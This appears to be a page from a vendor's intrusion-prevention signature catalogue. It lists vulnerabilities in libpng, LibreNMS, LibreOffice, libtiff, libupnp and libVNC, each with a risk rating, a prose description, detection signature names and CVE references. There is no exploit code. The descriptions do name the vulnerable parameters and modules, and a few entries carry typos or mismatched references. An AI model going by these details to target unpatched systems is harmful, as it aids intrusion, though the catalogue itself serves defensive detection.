https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18584

Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF

About this vulnerability:

Multiple buffer overflows in libpng graphics library

Risk:

High

First detected in:

sgpkg-ips-45-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Buffer Overflow

Description:

Libpng graphics library contains multiple buffer overflows: the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) dataand the png_handle_sBIT and png_handle_hIST functions do not perform sufficient bounds checking. A remote attacker could create malformed PNG image to execute arbitrary code on the system once the image file is opened by the victim. MSN Messenger and Windows Messenger are also affected by this vulnerability as reported in MS05-009.

Situation:

HTTP_SS-Libpng-PNG-Image-BOF
Generic_MS-Messenger-PNG-Image-BOF-MS05-009
File-PNG_Libpng-PNG-Image-BOF

References:

CVE-2004-0597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0597

BID-10857
http://www.securityfocus.com/bid/10857

BID-12506
http://www.securityfocus.com/bid/12506

OSVDB-8312
http://www.osvdb.org/8312

OSVDB-8326
http://www.osvdb.org/8326

MS05-009
http://technet.microsoft.com/security/bulletin/MS05-009

Libpng-PNG-Decompress-Chunk-Integer-Overflow

About this vulnerability:

A vulnerability in PNG Development Group libpng

Risk:

Moderate

First detected in:

sgpkg-ips-445-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libpng

Type:

Integer Overflow

Description:

A heap buffer overflow vulnerability has been reported in libpng. The vulnerability is due to an integer overflow error leading to overly small heap allocation in the function png_decompress_chunk(). An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user to open a crafted PNG file with an application that uses a vulnerable version of libpng, or submitting a malicious PNG to the server that utilizes the vulnerable library. Any injected code would run with the privileges of the affected application or service.

Situation:

HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow
File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow

References:

CVE-2011-3026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3026

OSVDB-79294
http://www.osvdb.org/79294

Libpng-PNG-Inflate-Buffer-Overflow

About this vulnerability:

A vulnerability in PNG Development Group libpng

Risk:

High

First detected in:

sgpkg-ips-445-4219

Last changed:

sgpkg-ips-1844-5242

Platform:

Generic

Software:

libpng

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been identified in libpng. The vulnerability is due to a type conversion flaw in the code that performs expansion of certain iCCP, iTXt, and zTXt PNG image file chunks. An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user to open a crafted PNG file with an application that uses a vulnerable version of libpng, or submitting a malicious PNG to the server that utilizes the vulnerable library. Any injected code would run with the privileges of the affected application or service.

Situation:

HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow
File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow

References:

CVE-2011-3045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3045

BID-52453
http://www.securityfocus.com/bid/52453

LibreNMS-Aboutcontroller.php-Command-Injection

About this vulnerability:

A vulnerability in LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1810-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of a configuration value when on the AboutController.php page causes a command injection vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-LibreNMS-Aboutcontroller-Command-Injection

References:

CVE-2024-51092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51092

LibreNMS-addhost-Command-Injection

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

LibreNMS

Type:

Input Validation

Description:

A vulnerability in LibreNMS, version 1.46, which allows remote attackers to execute arbitrary code do to insufficient user input validation of the community parameter in a POST request to /addhost.

Situation:

HTTP_CSU-LibreNMS-addhost-Command-Injection

References:

CVE-2018-20434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20434

LibreNMS-Address-Search-Address-SQL-Injection

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1696-5242

Last changed:

sgpkg-ips-1696-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of request parameters in the address-search.inc.php module causes an SQL injection vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-LibreNMS-Address-Search-Address-SQL-Injection

References:

CVE-2023-5591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5591

LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1792-5242

Last changed:

sgpkg-ips-1792-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper input validation in the Alert Rules page causes a cross-site scripting vulnerability in LireNMS. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting

References:

CVE-2024-47525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47525

LibreNMS-API-Token-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1832-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of user input when adding an API token causes a cross-site scripting vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-LibreNMS-API-Token-Stored-Cross-Site-Scripting

References:

CVE-2024-49754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49754

LibreNMS-API_Functions-List_Devices-Order-SQL-Injection

About this vulnerability:

A vulnerability in LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1759-5242

Last changed:

sgpkg-ips-1759-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of the order parameter in the request in api_functions.inc.php module causes an SQL injection vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-LibreNMS-API_Functions-List_Devices-Order-SQL-Injection

References:

CVE-2024-32480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32480

LibreNMS-Authenticated-Command-Injection-CVE-2024-51092

About this vulnerability:

An attempt to exploit a vulnerability in LibreNMS detected

Risk:

High

First detected in:

sgpkg-ips-1810-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

An authenticated attacker can create dangerous directory names on the LibreNMS system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside "shell_exec()" calls, thus achieving arbitrary code execution.

Situation:

HTTP_CRL-LibreNMS-Authenticated-Command-Injection-CVE-2024-51092

References:

CVE-2024-51092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51092

LibreNMS-Bills-Information-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1589-5242

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in Bills modules on several parameters in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Bills-Information-Stored-Cross-Site-Scripting

References:

CVE-2022-3562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3562

LibreNMS-Collectd-Command-Injection

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibreNMS

Type:

Malfunction

Description:

There exists a command injection vulnerability in LibreNMS. Succesful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CSU-LibreNMS-Collectd-Command-Injection

References:

CVE-2019-10669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10669

LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when configuring a device with a display name. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457

References:

CVE-2024-53457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53457

LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-XSS-CVE-2025-23200

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1854-5242

Last changed:

sgpkg-ips-1854-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of user input when configuring the Misc settings of a device causes a cross-site scripting vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-Cross-Site-Scripting-CVE-2025-23200

References:

CVE-2025-23200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23200

LibreNMS-Device-Overview-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when adding services to a device. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Device-Overview-Stored-Cross-Site-Scripting

References:

CVE-2024-50352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50352

LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1862-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when configuring the port settings of a device. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199

References:

CVE-2025-23199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23199

LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1559-5242

Last changed:

sgpkg-ips-1559-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of input data in DeviceGroupController when processing the the Name parameter in the request causes a stored cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting

References:

CVE-2022-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4069

LibreNMS-Health-View-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1667-5242

Last changed:

sgpkg-ips-1667-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of parameters in multiple modules of the health view feature causes a cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-LibreNMS-Health-View-Reflected-Cross-Site-Scripting

References:

CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347

LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

Improper validation of notification titles in a request causes a cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting

References:

CVE-2022-4067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4067

LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS

Risk:

Moderate

First detected in:

sgpkg-ips-1630-5242

Last changed:

sgpkg-ips-1630-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation on HTTP requests in outages.inc.php. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting

References:

CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347

LibreNMS-Packages.inc.php-Package-Name-SQL-Injection

About this vulnerability:

A vulnerability in LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1748-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in packages.inc.php module on package name parameter in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-LibreNMS-Packages.inc.php-Package-Name-SQL-Injection

References:

CVE-2024-32461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32461

LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1628-5242

Last changed:

sgpkg-ips-1628-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation on HTTP requests in list.inc.php of Ports module. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CRL-LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting

References:

CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347

LibreNMS-ServiceTemplateController.php-Name-Stored-CSS

About this vulnerability:

An attempt to exploit a vulnerability in LibreNMS detected

Risk:

High

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Linux

Software:

LibreNMS

Type:

Input Validation

Description:

A vulnerability in LibreNMS, versions prior to 24.4.0, which allows remote attackers to execute arbitrary code in a victim's browser by seding a crafted HTTP request to the target server, due to insufficient input validation of the name parameter in the ServiceTemplateController.php module.

Situation:

HTTP_CRL-LibreNMS-ServiceTemplateController.php-Name-Stored-CSS

References:

CVE-2024-32479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32479

LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LibreNMS LibreNMS

Risk:

High

First detected in:

sgpkg-ips-1594-5242

Last changed:

sgpkg-ips-1594-5242

Platform:

Generic

Software:

LibreNMS

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in UserController.php module on username parameter in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CS-LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting

References:

CVE-2022-4068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4068

LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow

About this vulnerability:

A vulnerability in Apache Software Foundation OpenOffice

Risk:

Moderate

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

An insufficient size check in the parsing of PrinterData elements in ODF documents can be exploited by a crafted file. A successful exploit allows code execution on the affected machine.

Situation:

File-TextId_LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow

References:

CVE-2015-5212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5212

LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425

About this vulnerability:

A vulnerability in LibreOffice LibreOffice

Risk:

Moderate

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

LibreOffice

Type:

Directory Traversal

Description:

The lack of validation of font names included in a document causes a directory traversal vulnerability in LibreOffice. A successful exploitation allows an attacker to write files on the target system.

Situation:

File-TextId_LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425

References:

CVE-2024-12425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12425

LibreOffice-Hsqldb-Arbitrary-File-Write

About this vulnerability:

A vulnerability in LibreOffice

Risk:

Moderate

First detected in:

sgpkg-ips-1610-5242

Last changed:

sgpkg-ips-1610-5242

Platform:

Generic

Software:

LibreOffice

Type:

Malfunction

Description:

Insecure handling of scripts in the HSQLDB database engine of LibreOffice causes an arbitrary file write vulnerability. A successful exploitation allows an attacker to write arbitrary files on the target system.

Situation:

File-Text_LibreOffice-Hsqldb-Arbitrary-File-Write

References:

CVE-2023-1183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1183

LibreOffice-Librelogo-Arbitrary-Code-Execution

About this vulnerability:

A vulnerability in LibreOffice

Risk:

Moderate

First detected in:

sgpkg-ips-1180-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibreOffice

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability in LibreOffice. This vulnerability could be exploited by opening a crafted office document. Successful exploitation could lead in arbitrary code execution.

Situation:

File-TextId_LibreOffice-Librelogo-Arbitrary-Code-Execution

References:

CVE-2019-9848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9848

LibreOffice-Macro-Event-Remote-Code-Execution

About this vulnerability:

A vulnerability in LibreOffice

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibreOffice; Apache OpenOffice

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in LibreOffice. The vulnerability is due to insufficient validation of paths, and arguments when processing event-listeners in LibreOffice documents. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted office document. Successful exploitation could result in arbitrary code execution under the security context of the user.

Situation:

File-TextId_LibreOffice-Macro-Event-Remote-Code-Execution

References:

CVE-2018-16858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16858

LibreOffice-RTF-Parser-Use-After-Free

About this vulnerability:

A vulnerability in LibreOffice LibreOffice

Risk:

Moderate

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibreOffice

Type:

Malfunction

Description:

Improper parsing of RTF files in LibreOffice results in a use after free vulnerability. By means of a crafted file, an attacker can gain the ability to run arbitrary code on the target with the privileges of the current user.

Situation:

File-RTF_LibreOffice-RTF-Parser-Use-After-Free

References:

CVE-2016-4324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4324

LibreOffice-Webservice-Information-Disclosure

About this vulnerability:

A vulnerability in LibreOffice

Risk:

Moderate

First detected in:

sgpkg-ips-1071-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibreOffice

Type:

Input Validation

Description:

Improper validation of the WEBSERVICE() function argument causes an information disclosure vulnerability in LibreOffice. A successful exploit allows a remote attacker to read arbitrary files on the target system without authentication.

Situation:

File-TextId_LibreOffice-Webservice-Information-Disclosure

References:

CVE-2018-6871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871

Libsndfile-PAF-File-Integer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in the libsndfile library detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libsndfile

Type:

Malfunction

Description:

An integer overflow vulnerability exists in the Paris Audio Format (PAF) handler of the libsndfile library, which can result in a heap buffer overflow.

Situation:

HTTP_SS-Libsndfile-PAF-File-Integer-Overflow
File-Binary_Libsndfile-PAF-File-Integer-Overflow

References:

CVE-2011-2696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2696

BID-48644
http://www.securityfocus.com/bid/48644

Libspf2-Macro-Expansion-Integer-Underflow

About this vulnerability:

A vulnerability in libspf2

Risk:

High

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

libspf2

Type:

Integer Overflow

Description:

An integer underflow vulnerability has been reported for libspf2. The vulnerability is due to a lack of proper input validation when processing SPF macros. A remote unauthenticated attacker can exploit the vulnerability by sending an email from a domain configured with a crafted SPF record. Successfully exploiting this vulnerability could result in arbitrary code execution under the security context of the embedding application.

Situation:

DNS-UDP_Libspf2-Macro-Expansion-Integer-Underflow

References:

CVE-2023-42118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42118

Libtiff-Jbigdecode-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in libtiff libtiff

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libtiff

Type:

Buffer Overflow

Description:

Insufficient checks of JBIG-compressed data causes a heap-buffer overflow vulnerability in Libtiff. A successful exploit may allow an attacker to execute code on the target.

Situation:

File-Binary_Libtiff-Jbigdecode-Heap-Buffer-Overflow

References:

CVE-2018-18557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18557

Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read

About this vulnerability:	A vulnerability in libtiff libtiff
Risk:	Moderate
First detected in:	sgpkg-ips-1341-5242
Last changed:	sgpkg-ips-1341-5242
Platform:	Generic
Software:	libtiff
Type:	Malfunction
Description:	Improper handling of TIFF files causes an out of bounds read vulnerability in libtiff. A successful exploit may allow an attacker to execute code with the privileges of the affected process.
Situation:	File-Binary_Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read

Libupnp-Device-Service-Name-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux SDK for UPnP libupnp

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

libupnp

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Intel SDK for UPnP and Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing uuid:schemas:device service name strings in the unique_service_name() function called from SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.

Situation:

Generic_UDP-Libupnp-Device-Service-Name-Stack-Buffer-Overflow

References:

CVE-2012-5958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5958

BID-57602
http://www.securityfocus.com/bid/57602

OSVDB-89611
http://www.osvdb.org/89611

Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux SDK for UPnP libupnp

Risk:

High

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libupnp

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Intel's SDK for UPnP and the Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing UUID: service name URIs in the unique_service_name() function called from the SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.

Situation:

Generic_UDP-Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow

References:

CVE-2012-5959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5959

BID-57602
http://www.securityfocus.com/bid/57602

OSVDB-89611
http://www.osvdb.org/89611

Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux SDK for UPnP libupnp

Risk:

Moderate

First detected in:

sgpkg-ips-664-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libupnp

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Intel's SDK for UPnP and the Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing ::upnp:rootdevice service name URIs in the unique_service_name() function called from the SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.

Situation:

Generic_UDP-Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow

References:

CVE-2012-5960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5960

BID-57602
http://www.securityfocus.com/bid/57602

OSVDB-89611
http://www.osvdb.org/89611

Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in libVNC LibVNCClient

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibVNCClient

Type:

Buffer Overflow

Description:

A heap based buffer overflow vulnerability in libVNC LibVNCClient, due to improper validation of data in CoRRE encodings, which allows remote attackers to execute remote code by sending a malicious RFB response to a client.

Situation:

RFB_SS-Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow

References:

CVE-2018-20020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20020

Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service

About this vulnerability:

A vulnerability in LibVNCServer Development Team LibVNCServer

Risk:

Moderate

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1311-5242

Platform:

Generic

Software:

LibVNCServer

Type:

Input Validation

Description:

Improper handling of VNC traffic causes a didide-by-zero vulnerability in libVNCServer which can be exploited to cause a denial of service condition.

Situation:

Generic_CS-Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service

References:

CVE-2020-25708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25708

Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free

About this vulnerability:

A vulnerability in LibVNCServer Development Team LibVNCServer

Risk:

Moderate

First detected in:

sgpkg-ips-1128-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibVNCServer

Type:

Malfunction

Description:

Improper validation of a Tight file transfer request in the Tight File Transfer extension of LibVNCServer causes a use after free vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free

References:

CVE-2018-6307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6307

Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in LibVNCServer Development Team LibVNCServer

Risk:

Moderate

First detected in:

sgpkg-ips-1125-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibVNCServer

Type:

Buffer Overflow

Description:

Improper validation of the file transfer request by the File Transfer extension causes a heap-based buffer overflow vulnerability in LibVNCServer. A successful exploit allows an attacker to execute code on the target system.

Situation:

Generic_CS-Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow

References:

CVE-2018-15127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15127

Libvncserver-LibvVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in LibVNCServer Development Team LibVNCServer

Risk:

Moderate

First detected in:

sgpkg-ips-842-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibVNCServer

Type:

Buffer Overflow

Description:

Improper handling of framebuffer update messages in libvncclient causes a heap buffer overflow vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system.

Situation:

RFB_SS-Libvncserver-LibVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow

References:

CVE-2016-9941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9941

Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service

About this vulnerability:

A vulnerability in LibVNCServer Development Team LibVNCServer

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibVNCServer

Type:

Input Validation

Description:

A denial of service vulnerability exists in LibVNCserver. The vulnerability is due to a division by zero when processing an rfbSetScale message. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted RFB message to the server. Successful exploitation could lead to a denial of service condition on the server.

Situation:

